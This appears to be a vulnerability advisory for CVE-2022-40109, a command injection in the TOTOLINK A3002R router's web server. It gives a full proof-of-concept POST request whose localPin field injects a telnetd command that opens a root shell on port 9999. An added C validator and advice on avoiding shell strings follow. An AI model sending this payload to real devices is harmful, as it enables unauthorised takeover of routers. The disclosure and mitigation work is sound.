CVE-2022-40109: iot/1.md at main · 1759134370/iot
TOTOLINK A3002R TOTOLINK-A3002R-He-V1.1.1-B20200824.0128 is vulnerable to Insecure Permissions via binary /bin/boa.
Where the vulnerability occurs: in the sub_4479D4 function of the binary /bin/boa, the localPin parameter is received from the front end and concatenated, without filtering, directly into a command string that is passed to system to run.
POST /boafrm/formWsc HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 155
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/wlwps.htm
Cookie: xxid=1488794641

submit-url=%2Fwlwps.htm&resetUnCfg=0&localPin=%0atelnetd -l /bin/sh -p 9999 -b 0.0.0.0%0a&targetAPMac=&targetAPSsid=&peerPin=&configVxd=off&resetRptUnCfg=0
Ports 9999 and 10000 reappeared after I changed the ports once, which did not affect the results.
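
The flaw described above goes away if localPin is accepted only when it has the shape of a WPS PIN before it reaches any command string. The following C validator is an added example, not code from the firmware or from the original report; the function name local_pin_is_valid and the decision to accept 4-digit as well as 8-digit PINs are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Checksum digit for the first seven digits of an 8-digit WPS PIN. */
static unsigned int wps_pin_checksum(unsigned long pin7)
{
    unsigned int accum = 0;
    while (pin7) {
        accum += 3 * (unsigned int)(pin7 % 10);
        pin7 /= 10;
        accum += (unsigned int)(pin7 % 10);
        pin7 /= 10;
    }
    return (10 - accum % 10) % 10;
}

/* Hypothetical helper (name is an assumption): returns 1 only when pin is
 * exactly 4 or 8 ASCII digits and, for 8 digits, the checksum matches.
 * Newlines, spaces and shell metacharacters all fail the digit test. */
int local_pin_is_valid(const char *pin)
{
    unsigned long value = 0;
    size_t len, i;

    if (pin == NULL)
        return 0;
    len = strlen(pin);
    if (len != 4 && len != 8)
        return 0;
    for (i = 0; i < len; i++) {
        if (pin[i] < '0' || pin[i] > '9')
            return 0;
        value = value * 10 + (unsigned long)(pin[i] - '0');
    }
    if (len == 8)
        return wps_pin_checksum(value / 10) == value % 10;
    return 1;
}

int main(void)
{
    /* Constructed samples; the last is the decoded localPin from the request above. */
    const char *samples[] = { "12345670", "12345678", "1234",
                              "\ntelnetd -l /bin/sh -p 9999 -b 0.0.0.0\n" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("sample %zu: %s\n", i, local_pin_is_valid(samples[i]) ? "accept" : "reject");
    return 0;
}
```

Even with this check in place, passing the PIN to the helper program as a separate argv element (for example via execve) instead of building a shell string removes the interpreter from the path entirely.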